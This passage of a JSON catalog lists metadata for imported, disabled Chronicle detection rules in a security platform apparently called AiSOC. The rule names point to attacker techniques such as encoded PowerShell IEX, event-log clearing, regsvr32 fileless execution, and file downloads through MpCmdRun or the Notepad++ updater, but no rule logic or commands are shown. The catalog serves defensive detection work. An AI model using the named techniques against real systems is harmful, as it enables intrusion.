"encoded_iex", "description": "encoded_iex", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/encoded-iex.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "encoded_iex", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/encoded_iex.yaral" } }, { "id": "chronicle-detection-rules-entra-id-admin-login-activity-to-uncommon-mscloud-apps", "type": "detection", "name": "entra_id_admin_login_activity_to_uncommon_mscloud_apps", "description": "entra_id_admin_login_activity_to_uncommon_mscloud_apps", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-admin-login-activity-to-uncommon-mscloud-apps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_admin_login_activity_to_uncommon_mscloud_apps", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_admin_login_activity_to_uncommon_mscloud_apps.yaral" } }, { "id": "chronicle-detection-rules-entra-id-application-deletion", "type": "detection", "name": "entra_id_application_deletion", "description": "entra_id_application_deletion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-application-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_application_deletion", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_application_deletion.yaral" } }, { "id": "chronicle-detection-rules-entra-id-application-hard-deletion", "type": "detection", "name": "entra_id_application_hard_deletion", "description": "entra_id_application_hard_deletion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-application-hard-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_application_hard_deletion", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_application_hard_deletion.yaral" } }, { "id": "chronicle-detection-rules-entra-id-application-restore", "type": "detection", "name": "entra_id_application_restore", "description": "entra_id_application_restore", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-application-restore.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_application_restore", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_application_restore.yaral" } }, { "id": "chronicle-detection-rules-entra-id-conditional-access-policy-modification", "type": "detection", "name": "entra_id_conditional_access_policy_modification", "description": "entra_id_conditional_access_policy_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-conditional-access-policy-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_conditional_access_policy_modification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_conditional_access_policy_modification.yaral" } }, { "id": "chronicle-detection-rules-entra-id-devicecode-phishing-attack", "type": "detection", "name": "entra_id_devicecode_phishing_attack", "description": "entra_id_devicecode_phishing_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-devicecode-phishing-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_devicecode_phishing_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_devicecode_phishing_attack.yaral" } }, { "id": "chronicle-detection-rules-entra-id-expired-refresh-token-use", "type": "detection", "name": "entra_id_expired_refresh_token_use", "description": "entra_id_expired_refresh_token_use", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-expired-refresh-token-use.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_expired_refresh_token_use", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_expired_refresh_token_use.yaral" } }, { "id": "chronicle-detection-rules-entra-id-group-deletion-success", "type": "detection", "name": "entra_id_group_deletion_success", "description": "entra_id_group_deletion_success", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-group-deletion-success.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_group_deletion_success", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_group_deletion_success.yaral" } }, { "id": "chronicle-detection-rules-entra-id-login-activity-to-azure-ad-powershell-app", "type": "detection", "name": "entra_id_login_activity_to_azure_ad_powershell_app", "description": "entra_id_login_activity_to_azure_ad_powershell_app", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-login-activity-to-azure-ad-powershell-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_login_activity_to_azure_ad_powershell_app", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_login_activity_to_azure_ad_powershell_app.yaral" } }, { "id": "chronicle-detection-rules-entra-id-login-activity-to-uncommon-mscloud-apps", "type": "detection", "name": "entra_id_login_activity_to_uncommon_mscloud_apps", "description": "entra_id_login_activity_to_uncommon_mscloud_apps", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-login-activity-to-uncommon-mscloud-apps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_login_activity_to_uncommon_mscloud_apps", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_login_activity_to_uncommon_mscloud_apps.yaral" } }, { "id": "chronicle-detection-rules-entra-id-recently-created-user-assigned-entra-id-roles", "type": "detection", "name": "entra_id_recently_created_user_assigned_entra_id_roles", "description": "entra_id_recently_created_user_assigned_entra_id_roles", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/entra-id-recently-created-user-assigned-entra-id-roles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "entra_id_recently_created_user_assigned_entra_id_roles", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/entra_id/entra_id_recently_created_user_assigned_azuread_roles.yaral" } }, { "id": "chronicle-detection-rules-evasion-base64-decode-arguments-in-powershell-possible-apt29-activity", "type": "detection", "name": "evasion_base64_decode_arguments_in_powershell_possible_apt29_activity", "description": "evasion_base64_decode_arguments_in_powershell_possible_apt29_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/evasion-base64-decode-arguments-in-powershell-possible-apt29-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "evasion_base64_decode_arguments_in_powershell_possible_apt29_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/evasion_base64_decode_arguments_in_powershell___possible_apt29_activity.yaral" } }, { "id": "chronicle-detection-rules-eventlog-cleared", "type": "detection", "name": "eventlog_cleared", "description": "eventlog_cleared", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/eventlog-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "eventlog_cleared", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/eventlog_cleared.yaral" } }, { "id": "chronicle-detection-rules-executables-started-in-suspicious-folder", "type": "detection", "name": "executables_started_in_suspicious_folder", "description": "executables_started_in_suspicious_folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/executables-started-in-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "executables_started_in_suspicious_folder", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/executables_started_in_suspicious_folder.yaral" } }, { "id": "chronicle-detection-rules-execution-in-nonexecutable-folder", "type": "detection", "name": "execution_in_nonexecutable_folder", "description": "execution_in_nonexecutable_folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/execution-in-nonexecutable-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "execution_in_nonexecutable_folder", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/execution_in_non_executable_folder.yaral" } }, { "id": "chronicle-detection-rules-execution-in-outlook-temp-folder", "type": "detection", "name": "execution_in_outlook_temp_folder", "description": "execution_in_outlook_temp_folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/execution-in-outlook-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "execution_in_outlook_temp_folder", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/execution_in_outlook_temp_folder.yaral" } }, { "id": "chronicle-detection-rules-existing-service-modified-detector-sysmon-behavior", "type": "detection", "name": "existing_service_modified_detector_sysmon_behavior", "description": "existing_service_modified_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/existing-service-modified-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "existing_service_modified_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/existing_service_modified_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-exploit-for-cve20151641", "type": "detection", "name": "exploit_for_cve20151641", "description": "exploit_for_cve20151641", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/exploit-for-cve20151641.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "exploit_for_cve20151641", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/process_creation/exploit_for_cve_2015_1641.yaral" } }, { "id": "chronicle-detection-rules-exploit-framework-user-agent", "type": "detection", "name": "exploit_framework_user_agent", "description": "exploit_framework_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/exploit-framework-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "exploit_framework_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/exploit_framework_user_agent.yaral" } }, { "id": "chronicle-detection-rules-exploited-cve202010189-zoho-manageengine", "type": "detection", "name": "exploited_cve202010189_zoho_manageengine", "description": "exploited_cve202010189_zoho_manageengine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/exploited-cve202010189-zoho-manageengine.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "exploited_cve202010189_zoho_manageengine", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/exploited_cve_2020_10189_zoho_manageengine.yaral" } }, { "id": "chronicle-detection-rules-fake-zoom-installerexe-devil-shadow-botnet", "type": "detection", "name": "fake_zoom_installerexe_devil_shadow_botnet", "description": "fake_zoom_installerexe_devil_shadow_botnet", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fake-zoom-installerexe-devil-shadow-botnet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fake_zoom_installerexe_devil_shadow_botnet", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/fake_zoom_installer_exe__devil_shadow_botnet.yaral" } }, { "id": "chronicle-detection-rules-fallout-rig-ek-delivers-raccoon-stealer", "type": "detection", "name": "fallout_rig_ek_delivers_raccoon_stealer", "description": "fallout_rig_ek_delivers_raccoon_stealer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fallout-rig-ek-delivers-raccoon-stealer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fallout_rig_ek_delivers_raccoon_stealer", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/fallout_rig_ek_delivers_raccoon_stealer.yaral" } }, { "id": "chronicle-detection-rules-file-creation-time-changed-via-powershell", "type": "detection", "name": "file_creation_time_changed_via_powershell", "description": "file_creation_time_changed_via_powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/file-creation-time-changed-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "file_creation_time_changed_via_powershell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/file_creation_time_changed_via_powershell.yaral" } }, { "id": "chronicle-detection-rules-file-deletion-via-cmd-via-cmdline", "type": "detection", "name": "file_deletion_via_cmd_via_cmdline", "description": "file_deletion_via_cmd_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/file-deletion-via-cmd-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "file_deletion_via_cmd_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/file_deletion_via_cmd__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-file-download-using-notepad-plus-plus-gup-utility", "type": "detection", "name": "file_download_using_notepad_plus_plus_gup_utility", "description": "file_download_using_notepad_plus_plus_gup_utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/file-download-using-notepad-plus-plus-gup-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "file_download_using_notepad_plus_plus_gup_utility", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/file_download_using_notepad_plus_plus_gup_utility.yaral" } }, { "id": "chronicle-detection-rules-file-download-via-windows-defender-mpcmdrun-exe", "type": "detection", "name": "file_download_via_windows_defender_mpcmdrun_exe", "description": "file_download_via_windows_defender_mpcmdrun_exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/file-download-via-windows-defender-mpcmdrun-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "file_download_via_windows_defender_mpcmdrun_exe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/file_download_via_windows_defender_mpcmdrun_exe.yaral" } }, { "id": "chronicle-detection-rules-fileless-attack-via-regsvr32exe", "type": "detection", "name": "fileless_attack_via_regsvr32exe", "description": "fileless_attack_via_regsvr32exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fileless-attack-via-regsvr32exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fileless_attack_via_regsvr32exe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/fileless_attack_via_regsvr32_exe.yaral" } }, { "id": "chronicle-detection-rules-finger-exe-execution", "type": "detection", "name": "finger_exe_execution", "description": "finger_exe_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/finger-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "finger_exe_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/finger_exe_execution.yaral" } }, { "id": "chronicle-detection-rules-fireeye-red-team-tool-adpasshunt-via-cmdline", "type": "detection", "name": "fireeye_red_team_tool__adpasshunt_via_cmdline", "description": "fireeye_red_team_tool__adpasshunt_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-adpasshunt-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__adpasshunt_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/fireeye_red_team_tool___adpasshunt__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-fireeye-red-team-tool-execavatorexe-via-cmdline", "type": "detection", "name": "fireeye_red_team_tool__execavatorexe_via_cmdline", "description": "fireeye_red_team_tool__execavatorexe_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-execavatorexe-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__execavatorexe_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/fireeye_red_team_tool___execavator_exe__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-fireeye-red-team-tool-execavatorexe-via-registry", "type": "detection", "name": "fireeye_red_team_tool__execavatorexe_via_registry", "description": "fireeye_red_team_tool__execavatorexe_via_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-execavatorexe-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__execavatorexe_via_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/registry_event/fireeye_red_team_tool___execavator_exe__via_registry.yaral" } }, { "id": "chronicle-detection-rules-fireeye-red-team-tool-g2js-suspicious-process-tree", "type": "detection", "name": "fireeye_red_team_tool__g2js_suspicious_process_tree", "description": "fireeye_red_team_tool__g2js_suspicious_process_tree", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/fireeye-red-team-tool-g2js-suspicious-process-tree.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "fireeye_red_team_tool__g2js_suspicious_process_tree", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 